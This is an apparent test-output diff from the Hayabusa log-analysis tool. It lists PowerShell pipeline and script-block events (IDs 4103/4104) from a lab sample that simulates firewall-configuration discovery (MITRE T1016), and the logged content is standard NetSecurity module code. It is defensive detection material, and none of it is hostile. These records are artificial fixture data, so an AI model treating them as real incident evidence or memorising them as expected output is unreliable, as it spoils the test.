'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallProfile""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallProfile""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { [object]$__cmdletization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdleti",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"zation_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { [object]$__cmdletization_value = ${LogFileName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { [object]$__cmdletization_value = ${LogBlocked} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { [object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = ${DisabledInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
